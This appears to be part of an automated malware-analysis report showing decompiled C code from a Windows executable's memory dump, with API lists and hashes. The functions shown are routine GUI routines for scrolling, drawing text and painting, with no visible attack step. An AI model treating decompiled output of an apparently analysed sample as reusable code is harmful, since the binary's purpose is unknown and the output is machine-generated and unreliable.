                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c8be4bc43f859d8c8afe2417128a037c4a7ad764e5036389b60e49141e276708
                                                                        • Instruction ID: a23f4c26fc7a9db08ee943cacd5cbd9e35e16fa5ad328059b8dc8150b4b01441
                                                                        • Opcode Fuzzy Hash: c8be4bc43f859d8c8afe2417128a037c4a7ad764e5036389b60e49141e276708
                                                                        • Instruction Fuzzy Hash: 6FB11A75A002599FDB10DF58C489BDEB7F5AF09309F1440A6EC44AB3A2C778AC4ACB59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0044F614, Relevance: 7.7, APIs: 5, Instructions: 171COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 89%
                                                                        			E0044F614(intOrPtr __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				signed char _t92;
				int _t98;
				int _t100;
				intOrPtr _t117;
				int _t122;
				intOrPtr _t155;
				void* _t164;
				signed char _t180;
				intOrPtr _t182;
				intOrPtr _t194;
				int _t199;
				intOrPtr _t203;
				void* _t204;

				_t204 = __eflags;
				_t196 = __edi;
				_t202 = _t203;
				_v8 = __eax;
				E0043961C(_v8);
				_push(_t203);
				_push(0x44f86a);
				_push( *[fs:edx]);
				 *[fs:edx] = _t203;
				 *(_v8 + 0x268) = 0;
				 *(_v8 + 0x26c) = 0;
				 *(_v8 + 0x270) = 0;
				_t164 = 0;
				_t92 =  *0x496709; // 0x0
				 *(_v8 + 0x234) = _t92 ^ 0x00000001;
				E00438D8C(_v8, 0, __edx, _t204);
				if( *(_v8 + 0x25c) == 0 ||  *(_v8 + 0x270) <= 0) {
					L12:
					_t98 =  *(_v8 + 0x268);
					_t213 = _t98;
					if(_t98 > 0) {
						E00435FC8(_v8, _t98, _t196, _t213);
					}
					_t100 =  *(_v8 + 0x26c);
					_t214 = _t100;
					if(_t100 > 0) {
						E0043600C(_v8, _t100, _t196, _t214);
					}
					_t180 =  *0x44f878; // 0x0
					 *(_v8 + 0x98) = _t180;
					_t215 = _t164;
					if(_t164 == 0) {
						E0044EB7C(_v8, 1, 1);
						E0043C730(_v8, 1, 1, _t215);
					}
					E00437760(_v8, 0, 0xb03d, 0);
					_pop(_t182);
					 *[fs:eax] = _t182;
					_push(0x44f871);
					return E00439624(_v8);
				} else {
					if(( *(_v8 + 0x98) & 0x00000010) != 0) {
						_t194 =  *0x496c08; // 0x215094c
						if( *(_v8 + 0x25c) !=  *((intOrPtr*)(_t194 + 0x40))) {
							_t155 =  *0x496c08; // 0x215094c
							E0041F64C( *((intOrPtr*)(_v8 + 0x68)), MulDiv(E0041F644( *((intOrPtr*)(_v8 + 0x68))),  *(_t155 + 0x40),  *(_v8 + 0x25c)), __edi, _t202);
						}
					}
					_t117 =  *0x496c08; // 0x215094c
					 *(_v8 + 0x25c) =  *(_t117 + 0x40);
					_t199 = E0044F99C(_v8);
					_t122 =  *(_v8 + 0x270);
					_t209 = _t199 - _t122;
					if(_t199 != _t122) {
						_t164 = 1;
						E0044EB7C(_v8, _t122, _t199);
						E0043C730(_v8,  *(_v8 + 0x270), _t199, _t209);
						if(( *(_v8 + 0x98) & 0x00000004) != 0) {
							 *(_v8 + 0x268) = MulDiv( *(_v8 + 0x268), _t199,  *(_v8 + 0x270));
						}
						if(( *(_v8 + 0x98) & 0x00000008) != 0) {
							 *(_v8 + 0x26c) = MulDiv( *(_v8 + 0x26c), _t199,  *(_v8 + 0x270));
						}
						if(( *(_v8 + 0x98) & 0x00000020) != 0) {
							 *(_v8 + 0x1fa) = MulDiv( *(_v8 + 0x1fa), _t199,  *(_v8 + 0x270));
							 *(_v8 + 0x1fe) = MulDiv( *(_v8 + 0x1fe), _t199,  *(_v8 + 0x270));
						}
					}
					goto L12;
				}
			}

















                                                                        0x0044f614
                                                                        0x0044f614
                                                                        0x0044f615
                                                                        0x0044f61c
                                                                        0x0044f622
                                                                        0x0044f629
                                                                        0x0044f62a
                                                                        0x0044f62f
                                                                        0x0044f632
                                                                        0x0044f63a
                                                                        0x0044f645
                                                                        0x0044f650
                                                                        0x0044f656
                                                                        0x0044f658
                                                                        0x0044f662
                                                                        0x0044f66d
                                                                        0x0044f67c
                                                                        0x0044f7de
                                                                        0x0044f7e1
                                                                        0x0044f7e7
                                                                        0x0044f7e9
                                                                        0x0044f7f0
                                                                        0x0044f7f0
                                                                        0x0044f7f8
                                                                        0x0044f7fe
                                                                        0x0044f800
                                                                        0x0044f807
                                                                        0x0044f807
                                                                        0x0044f80f
                                                                        0x0044f815
                                                                        0x0044f81b
                                                                        0x0044f81d
                                                                        0x0044f82c
                                                                        0x0044f83e
                                                                        0x0044f83e
                                                                        0x0044f84f
                                                                        0x0044f856
                                                                        0x0044f859
                                                                        0x0044f85c
                                                                        0x0044f869
                                                                        0x0044f692
                                                                        0x0044f69c
                                                                        0x0044f6a7
                                                                        0x0044f6b0
                                                                        0x0044f6bc
                                                                        0x0044f6dc
                                                                        0x0044f6dc
                                                                        0x0044f6b0
                                                                        0x0044f6e1
                                                                        0x0044f6ec
                                                                        0x0044f6fa
                                                                        0x0044f6ff
                                                                        0x0044f705
                                                                        0x0044f707
                                                                        0x0044f70d
                                                                        0x0044f716
                                                                        0x0044f729
                                                                        0x0044f738
                                                                        0x0044f757
                                                                        0x0044f757
                                                                        0x0044f767
                                                                        0x0044f786
                                                                        0x0044f786
                                                                        0x0044f796
                                                                        0x0044f7b5
                                                                        0x0044f7d8
                                                                        0x0044f7d8
                                                                        0x0044f796
                                                                        0x00000000
                                                                        0x0044f707

                                                                        APIs
                                                                        • MulDiv.KERNEL32(00000000,?,00000000), ref: 0044F6D3
                                                                        • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044F74F
                                                                        • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044F77E
                                                                        • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044F7AD
                                                                        • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044F7D0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f83b6f54dddd89dbe0c70f2b225cc0d110cc9cf3e54e16450356abb0dd6b52aa
                                                                        • Instruction ID: b7fbed5c6db0269f7e2fea028abd8eb97cbe5c16f41f339bba14ab5bac44c86c
                                                                        • Opcode Fuzzy Hash: f83b6f54dddd89dbe0c70f2b225cc0d110cc9cf3e54e16450356abb0dd6b52aa
                                                                        • Instruction Fuzzy Hash: 2D71D574A04104EFDB00DBA9C589EADB3F5AF49304F2541F6E808EB362C739AE45DB44
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0045EFF4, Relevance: 7.7, APIs: 5, Instructions: 168COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 87%
                                                                        			E0045EFF4(void* __eax, int __ecx, signed int __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				struct tagRECT _v28;
				char _v44;
				int _t90;
				void* _t109;
				void* _t125;
				void* _t131;
				intOrPtr _t142;
				int _t143;

				_t143 = __ecx;
				_v8 = __edx;
				_t125 = __eax;
				_t142 = _a4;
				_v12 = 2;
				if( *((char*)(__eax + 0x28c)) == 0) {
					_v12 = _v12 | 0x00000004;
				}
				_t147 = _t143;
				if(_t143 != 0) {
					__eflags = _v8;
					if(_v8 != 0) {
						_t29 = _t142 + 0x34; // 0xe89c933
						_t31 = _t142 + 0xc; // 0x895653ec
						E00412BCC( *_t31, 0,  &_v28,  *_t29);
						ScrollWindowEx(E0043CC2C(_t125), _v8, 0,  &_v28,  &_v28, 0, 0, _v12);
						_t37 = _t142 + 0x3c; // 0x55894233
						_t39 = _t142 + 4; // 0x55c35b5e
						_t40 = _t142 + 0x34; // 0xe89c933
						__eflags = 0;
						E00412BCC( *_t39,  *_t40,  &_v28,  *_t37);
						ScrollWindowEx(E0043CC2C(_t125), 0, _t143,  &_v28,  &_v28, 0, 0, _v12);
						_t44 = _t142 + 0x3c; // 0x55894233
						_t46 = _t142 + 0xc; // 0x895653ec
						_t47 = _t142 + 0x34; // 0xe89c933
						E00412BCC( *_t46,  *_t47,  &_v28,  *_t44);
						_t90 = ScrollWindowEx(E0043CC2C(_t125), _v8, _t143,  &_v28,  &_v28, 0, 0, _v12);
					} else {
						_t22 = _t142 + 0x3c; // 0x55894233
						_t24 = _t142 + 0xc; // 0x895653ec
						_t25 = _t142 + 0x34; // 0xe89c933
						E00412BCC( *_t24,  *_t25,  &_v28,  *_t22);
						_t90 = ScrollWindowEx(E0043CC2C(_t125), 0, _t143,  &_v28,  &_v28, 0, 0, _v12);
					}
				} else {
					if(E004037D8(_t125, _t147) != 0) {
						_t11 = _t142 + 0x3c; // 0x55894233
						_push( *_t11);
						_push( &_v28);
						_t109 = E00435FB0(_t125);
						_t13 = _t142 + 4; // 0x55c35b5e
						_push(_t109 -  *_t13);
						E00435FB0(_t125);
						__eflags = 0;
						_pop(_t131);
						E00412BCC(_t131, 0);
						_v8 =  ~_v8;
					} else {
						_t7 = _t142 + 0x3c; // 0x55894233
						_t9 = _t142 + 0xc; // 0x895653ec
						E00412BCC( *_t9, 0,  &_v28,  *_t7);
					}
					_t90 = ScrollWindowEx(E0043CC2C(_t125), _v8, 0,  &_v28,  &_v28, 0, 0, _v12);
				}
				_t149 =  *(_t125 + 0x249) & 0x00000010;
				if(( *(_t125 + 0x249) & 0x00000010) == 0) {
					return _t90;
				} else {
					E00460800(_t125,  &_v44);
					return E0045E6F0(_t125,  &_v44, _t149);
				}
			}













                                                                        0x0045effd
                                                                        0x0045efff
                                                                        0x0045f002
                                                                        0x0045f004
                                                                        0x0045f007
                                                                        0x0045f015
                                                                        0x0045f017
                                                                        0x0045f017
                                                                        0x0045f01b
                                                                        0x0045f01d
                                                                        0x0045f095
                                                                        0x0045f099
                                                                        0x0045f0d5
                                                                        0x0045f0dd
                                                                        0x0045f0e5
                                                                        0x0045f108
                                                                        0x0045f10d
                                                                        0x0045f115
                                                                        0x0045f118
                                                                        0x0045f11b
                                                                        0x0045f11d
                                                                        0x0045f13d
                                                                        0x0045f142
                                                                        0x0045f14a
                                                                        0x0045f14d
                                                                        0x0045f153
                                                                        0x0045f175
                                                                        0x0045f09b
                                                                        0x0045f09b
                                                                        0x0045f0a3
                                                                        0x0045f0a6
                                                                        0x0045f0ab
                                                                        0x0045f0cb
                                                                        0x0045f0cb
                                                                        0x0045f01f
                                                                        0x0045f02c
                                                                        0x0045f045
                                                                        0x0045f048
                                                                        0x0045f04c
                                                                        0x0045f04f
                                                                        0x0045f054
                                                                        0x0045f057
                                                                        0x0045f05a
                                                                        0x0045f062
                                                                        0x0045f064
                                                                        0x0045f065
                                                                        0x0045f06a
                                                                        0x0045f02e
                                                                        0x0045f02e
                                                                        0x0045f036
                                                                        0x0045f03e
                                                                        0x0045f03e
                                                                        0x0045f08b
                                                                        0x0045f08b
                                                                        0x0045f17a
                                                                        0x0045f181
                                                                        0x0045f19d
                                                                        0x0045f183
                                                                        0x0045f188
                                                                        0x00000000
                                                                        0x0045f192

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: ScrollWindow
                                                                        • String ID:
                                                                        • API String ID: 2126015319-0
                                                                        • Opcode ID: 012e01d2e5b07f3e9b05cfdc662a801196811393e83e2eaebac9e87f70118fcb
                                                                        • Instruction ID: 7e4e7f4e2f5f89522f6d3bfcac37a2a193213212823b79a250b46dc624b20d20
                                                                        • Opcode Fuzzy Hash: 012e01d2e5b07f3e9b05cfdc662a801196811393e83e2eaebac9e87f70118fcb
                                                                        • Instruction Fuzzy Hash: EF51E171600509BBD700EEA5CD82FEFB7ACAF08304F405526BA05E7682DB74F955CBA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004469BC, Relevance: 7.7, APIs: 5, Instructions: 162COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 85%
                                                                        			E004469BC(void* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, int _a4, char _a8, struct tagRECT* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				struct tagRECT _v32;
				void* _t53;
				int _t63;
				CHAR* _t65;
				void* _t76;
				void* _t78;
				int _t89;
				CHAR* _t91;
				int _t117;
				intOrPtr _t127;
				void* _t139;
				void* _t144;
				char _t153;

				_t120 = __ecx;
				_t143 = _t144;
				_v16 = 0;
				_v12 = __ecx;
				_v8 = __edx;
				_t139 = __eax;
				_t117 = _a4;
				_push(_t144);
				_push(0x446ba0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t144 + 0xffffffe4;
				_t53 = E00448820(__eax);
				_t135 = _t53;
				if(_t53 != 0 && E00449E5C(_t135) != 0) {
					if((_t117 & 0x00000000) != 0) {
						__eflags = (_t117 & 0x00000002) - 2;
						if((_t117 & 0x00000002) == 2) {
							_t117 = _t117 & 0xfffffffd;
							__eflags = _t117;
						}
					} else {
						_t117 = _t117 & 0xffffffff | 0x00000002;
					}
					_t117 = _t117 | 0x00020000;
				}
				E004043E0( &_v16, _v12);
				if((_t117 & 0x00000004) == 0) {
					L12:
					E00404744(_v16, 0x446bc4);
					if(_t153 != 0) {
						E0041FD6C( *((intOrPtr*)(_v8 + 0x14)), _t120, 1, _t135, _t143, __eflags);
						__eflags =  *((char*)(_t139 + 0x3a));
						if( *((char*)(_t139 + 0x3a)) != 0) {
							_t136 =  *((intOrPtr*)(_v8 + 0xc));
							__eflags = E0041F724( *((intOrPtr*)(_v8 + 0xc))) |  *0x446bc8;
							E0041F730( *((intOrPtr*)(_v8 + 0xc)), E0041F724( *((intOrPtr*)(_v8 + 0xc))) |  *0x446bc8, _t136, _t139, _t143);
						}
						__eflags =  *((char*)(_t139 + 0x39));
						if( *((char*)(_t139 + 0x39)) != 0) {
							L24:
							_t63 = E00404600(_v16);
							_t65 = E004047F8(_v16);
							DrawTextA(E00420730(_v8), _t65, _t63, _a12, _t117);
							L25:
							_pop(_t127);
							 *[fs:eax] = _t127;
							_push(0x446ba7);
							return E00404348( &_v16);
						} else {
							__eflags = _a8;
							if(_a8 == 0) {
								OffsetRect(_a12, 1, 1);
								E0041F464( *((intOrPtr*)(_v8 + 0xc)), 0x80000014);
								_t89 = E00404600(_v16);
								_t91 = E004047F8(_v16);
								DrawTextA(E00420730(_v8), _t91, _t89, _a12, _t117);
								OffsetRect(_a12, 0xffffffff, 0xffffffff);
							}
							__eflags = _a8;
							if(_a8 == 0) {
								L23:
								E0041F464( *((intOrPtr*)(_v8 + 0xc)), 0x80000010);
							} else {
								_t76 = E0041EFA4(0x8000000d);
								_t78 = E0041EFA4(0x80000010);
								__eflags = _t76 - _t78;
								if(_t76 != _t78) {
									goto L23;
								}
								E0041F464( *((intOrPtr*)(_v8 + 0xc)), 0x80000014);
							}
							goto L24;
						}
					}
					if((_t117 & 0x00000004) == 0) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_v32.top = _v32.top + 4;
						DrawEdge(E00420730(_v8),  &_v32, 6, 2);
					}
					goto L25;
				} else {
					if(_v16 == 0) {
						L11:
						E00404608( &_v16, 0x446bb8);
						goto L12;
					}
					if( *_v16 != 0x26) {
						goto L12;
					}
					_t153 =  *((char*)(_v16 + 1));
					if(_t153 != 0) {
						goto L12;
					}
					goto L11;
				}
			}



















                                                                        0x004469bc
                                                                        0x004469bd
                                                                        0x004469c7
                                                                        0x004469ca
                                                                        0x004469cd
                                                                        0x004469d0
                                                                        0x004469d2
                                                                        0x004469d7
                                                                        0x004469d8
                                                                        0x004469dd
                                                                        0x004469e0
                                                                        0x004469e5
                                                                        0x004469ea
                                                                        0x004469ee
                                                                        0x004469fe
                                                                        0x00446a0d
                                                                        0x00446a10
                                                                        0x00446a15
                                                                        0x00446a15
                                                                        0x00446a15
                                                                        0x00446a00
                                                                        0x00446a03
                                                                        0x00446a03
                                                                        0x00446a18
                                                                        0x00446a18
                                                                        0x00446a24
                                                                        0x00446a2c
                                                                        0x00446a52
                                                                        0x00446a5a
                                                                        0x00446a5f
                                                                        0x00446a9d
                                                                        0x00446aa2
                                                                        0x00446aa6
                                                                        0x00446aab
                                                                        0x00446ab7
                                                                        0x00446abf
                                                                        0x00446abf
                                                                        0x00446ac4
                                                                        0x00446ac8
                                                                        0x00446b65
                                                                        0x00446b6d
                                                                        0x00446b76
                                                                        0x00446b85
                                                                        0x00446b8a
                                                                        0x00446b8c
                                                                        0x00446b8f
                                                                        0x00446b92
                                                                        0x00446b9f
                                                                        0x00446ace
                                                                        0x00446ace
                                                                        0x00446ad2
                                                                        0x00446adc
                                                                        0x00446aec
                                                                        0x00446af9
                                                                        0x00446b02
                                                                        0x00446b11
                                                                        0x00446b1e
                                                                        0x00446b1e
                                                                        0x00446b23
                                                                        0x00446b27
                                                                        0x00446b55
                                                                        0x00446b60
                                                                        0x00446b29
                                                                        0x00446b2e
                                                                        0x00446b3a
                                                                        0x00446b3f
                                                                        0x00446b41
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00446b4e
                                                                        0x00446b4e
                                                                        0x00000000
                                                                        0x00446b27
                                                                        0x00446ac8
                                                                        0x00446a64
                                                                        0x00446a72
                                                                        0x00446a73
                                                                        0x00446a74
                                                                        0x00446a75
                                                                        0x00446a76
                                                                        0x00446a8b
                                                                        0x00446a8b
                                                                        0x00000000
                                                                        0x00446a2e
                                                                        0x00446a32
                                                                        0x00446a45
                                                                        0x00446a4d
                                                                        0x00000000
                                                                        0x00446a4d
                                                                        0x00446a3a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00446a3f
                                                                        0x00446a43
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00446a43

                                                                        APIs
                                                                        • DrawEdge.USER32(00000000,?,00000006,00000002), ref: 00446A8B
                                                                        • OffsetRect.USER32(?,00000001,00000001), ref: 00446ADC
                                                                        • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00446B11
                                                                        • OffsetRect.USER32(?,000000FF,000000FF), ref: 00446B1E
                                                                        • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00446B85
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Draw$OffsetRectText$Edge
                                                                        • String ID:
                                                                        • API String ID: 3610532707-0
                                                                        • Opcode ID: 85062a5ebc0655283848f6502ddf073e01523f4b758b7f32a43d0701a49e740e
                                                                        • Instruction ID: 6b641bb0bc6ef2255d17c86df0a205ba80bac31eaa022483ee7a4ef997933482
                                                                        • Opcode Fuzzy Hash: 85062a5ebc0655283848f6502ddf073e01523f4b758b7f32a43d0701a49e740e
                                                                        • Instruction Fuzzy Hash: 9E516770A006446FEB10EBA9C881B9F77E5DF46314F15816AF914F7391C73CAD418B1A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0042B85C, Relevance: 7.6, APIs: 5, Instructions: 110COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 77%
                                                                        			E0042B85C(intOrPtr* __eax, void* __ebx, signed int __ecx, struct tagRECT* __edx, void* __edi, void* __esi) {
				char _v8;
				int _t40;
				CHAR* _t42;
				int _t54;
				CHAR* _t56;
				int _t65;
				CHAR* _t67;
				intOrPtr* _t76;
				intOrPtr _t86;
				struct tagRECT* _t91;
				signed int _t93;
				int _t94;
				intOrPtr _t97;
				signed int _t104;

				_push(0);
				_t93 = __ecx;
				_t91 = __edx;
				_t76 = __eax;
				_push(_t97);
				_push(0x42b9b2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t97;
				 *((intOrPtr*)( *__eax + 0x90))();
				if((__ecx & 0x00000400) != 0 && (_v8 == 0 ||  *((char*)(__eax + 0x170)) != 0 &&  *_v8 == 0x26 &&  *((char*)(_v8 + 1)) == 0)) {
					E00404608( &_v8, 0x42b9c8);
				}
				if( *((char*)(_t76 + 0x170)) == 0) {
					_t104 = _t93;
				}
				_t94 = E00438890(_t76, _t93, _t104);
				E0042062C( *((intOrPtr*)(_t76 + 0x160)));
				if( *((intOrPtr*)( *_t76 + 0x50))() != 0) {
					_t40 = E00404600(_v8);
					_t42 = E004047F8(_v8);
					DrawTextA(E00420730( *((intOrPtr*)(_t76 + 0x160))), _t42, _t40, _t91, _t94);
				} else {
					OffsetRect(_t91, 1, 1);
					E0041F464( *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x160)) + 0xc)), 0x80000014);
					_t54 = E00404600(_v8);
					_t56 = E004047F8(_v8);
					DrawTextA(E00420730( *((intOrPtr*)(_t76 + 0x160))), _t56, _t54, _t91, _t94);
					OffsetRect(_t91, 0xffffffff, 0xffffffff);
					E0041F464( *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x160)) + 0xc)), 0x80000010);
					_t65 = E00404600(_v8);
					_t67 = E004047F8(_v8);
					DrawTextA(E00420730( *((intOrPtr*)(_t76 + 0x160))), _t67, _t65, _t91, _t94);
				}
				_pop(_t86);
				 *[fs:eax] = _t86;
				_push(0x42b9b9);
				return E00404348( &_v8);
			}

















                                                                        0x0042b85f
                                                                        0x0042b864
                                                                        0x0042b866
                                                                        0x0042b868
                                                                        0x0042b86c
                                                                        0x0042b86d
                                                                        0x0042b872
                                                                        0x0042b875
                                                                        0x0042b87f
                                                                        0x0042b88b
                                                                        0x0042b8b5
                                                                        0x0042b8b5
                                                                        0x0042b8c1
                                                                        0x0042b8c3
                                                                        0x0042b8c3
                                                                        0x0042b8d2
                                                                        0x0042b8dd
                                                                        0x0042b8eb
                                                                        0x0042b97c
                                                                        0x0042b985
                                                                        0x0042b997
                                                                        0x0042b8f1
                                                                        0x0042b8f6
                                                                        0x0042b909
                                                                        0x0042b913
                                                                        0x0042b91c
                                                                        0x0042b92e
                                                                        0x0042b938
                                                                        0x0042b94b
                                                                        0x0042b955
                                                                        0x0042b95e
                                                                        0x0042b970
                                                                        0x0042b970
                                                                        0x0042b99e
                                                                        0x0042b9a1
                                                                        0x0042b9a4
                                                                        0x0042b9b1

                                                                        APIs
                                                                        • OffsetRect.USER32(?,00000001,00000001), ref: 0042B8F6
                                                                        • DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 0042B92E
                                                                        • OffsetRect.USER32(?,000000FF,000000FF), ref: 0042B938
                                                                        • DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 0042B970
                                                                        • DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 0042B997
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: DrawText$OffsetRect
                                                                        • String ID:
                                                                        • API String ID: 1886049697-0
                                                                        • Opcode ID: 662b6b3a40582923ac273cb24c9d502d2feb4a56df99f8a9edd9d85c2ba6a157
                                                                        • Instruction ID: 1d1b475f9fabfd745f91b6a763abeaaa6df454c933534dc2db13d73f98644ccc
                                                                        • Opcode Fuzzy Hash: 662b6b3a40582923ac273cb24c9d502d2feb4a56df99f8a9edd9d85c2ba6a157
                                                                        • Instruction Fuzzy Hash: 91318470B04214AFDB11FB69DC85B8B77E9EF45314F5140BAF908EB292CB79AD009768
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0043A97C, Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 85%
                                                                        			E0043A97C(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				struct tagPAINTSTRUCT _v84;
				intOrPtr _t55;
				void* _t64;
				struct HDC__* _t75;
				intOrPtr _t84;
				void* _t95;
				void* _t96;
				void* _t98;
				void* _t100;
				void* _t101;
				intOrPtr _t102;

				_t100 = _t101;
				_t102 = _t101 + 0xffffffb0;
				_v12 = __edx;
				_v8 = __eax;
				_t75 =  *(_v12 + 4);
				if(_t75 == 0) {
					_t75 = BeginPaint(E0043CC2C(_v8),  &_v84);
				}
				_push(_t100);
				_push(0x43aa9c);
				_push( *[fs:edx]);
				 *[fs:edx] = _t102;
				if( *((intOrPtr*)(_v8 + 0x198)) != 0) {
					_v20 = SaveDC(_t75);
					_v16 = 2;
					_t95 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x198)) + 8)) - 1;
					if(_t95 >= 0) {
						_t96 = _t95 + 1;
						_t98 = 0;
						do {
							_t64 = E00414208( *((intOrPtr*)(_v8 + 0x198)), _t98);
							if( *((char*)(_t64 + 0x57)) != 0 || ( *(_t64 + 0x1c) & 0x00000010) != 0 && ( *(_t64 + 0x51) & 0x00000004) == 0) {
								if(( *(_t64 + 0x50) & 0x00000040) == 0) {
									goto L11;
								} else {
									_v16 = ExcludeClipRect(_t75,  *(_t64 + 0x40),  *(_t64 + 0x44),  *(_t64 + 0x40) +  *((intOrPtr*)(_t64 + 0x48)),  *(_t64 + 0x44) +  *((intOrPtr*)(_t64 + 0x4c)));
									if(_v16 != 1) {
										goto L11;
									}
								}
							} else {
								goto L11;
							}
							goto L12;
							L11:
							_t98 = _t98 + 1;
							_t96 = _t96 - 1;
						} while (_t96 != 0);
					}
					L12:
					if(_v16 != 1) {
						 *((intOrPtr*)( *_v8 + 0xb8))();
					}
					RestoreDC(_t75, _v20);
				} else {
					 *((intOrPtr*)( *_v8 + 0xb8))();
				}
				E0043AAD8(_v8, 0, _t75);
				_pop(_t84);
				 *[fs:eax] = _t84;
				_push(0x43aaa3);
				_t55 = _v12;
				if( *((intOrPtr*)(_t55 + 4)) == 0) {
					return EndPaint(E0043CC2C(_v8),  &_v84);
				}
				return _t55;
			}


















                                                                        0x0043a97d
                                                                        0x0043a97f
                                                                        0x0043a985
                                                                        0x0043a988
                                                                        0x0043a98e
                                                                        0x0043a993
                                                                        0x0043a9a7
                                                                        0x0043a9a7
                                                                        0x0043a9ab
                                                                        0x0043a9ac
                                                                        0x0043a9b1
                                                                        0x0043a9b4
                                                                        0x0043a9c1
                                                                        0x0043a9db
                                                                        0x0043a9de
                                                                        0x0043a9f1
                                                                        0x0043a9f4
                                                                        0x0043a9f6
                                                                        0x0043a9f7
                                                                        0x0043a9f9
                                                                        0x0043aa04
                                                                        0x0043aa0d
                                                                        0x0043aa1f
                                                                        0x00000000
                                                                        0x0043aa21
                                                                        0x0043aa3d
                                                                        0x0043aa44
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0043aa44
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0043aa46
                                                                        0x0043aa46
                                                                        0x0043aa47
                                                                        0x0043aa47
                                                                        0x0043a9f9
                                                                        0x0043aa4a
                                                                        0x0043aa4e
                                                                        0x0043aa57
                                                                        0x0043aa57
                                                                        0x0043aa62
                                                                        0x0043a9c3
                                                                        0x0043a9ca
                                                                        0x0043a9ca
                                                                        0x0043aa6e
